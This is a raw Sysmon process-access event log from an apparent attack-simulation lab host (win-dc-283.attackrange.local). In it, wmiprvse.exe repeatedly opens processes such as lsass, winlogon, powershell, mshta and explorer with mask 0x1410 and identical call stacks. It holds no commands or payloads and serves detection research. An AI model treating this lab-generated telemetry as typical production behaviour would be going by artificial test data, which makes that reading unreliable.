15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028114Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028113Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028112Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028111Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028110Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028109Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028108Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028107Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5372-6008-7F06-00000000A301}5808C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028106Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5372-6008-7E06-00000000A301}3400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028105Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028104Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028103Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028102Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028101Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028100Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028099Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028098Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028097Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028096Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028095Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 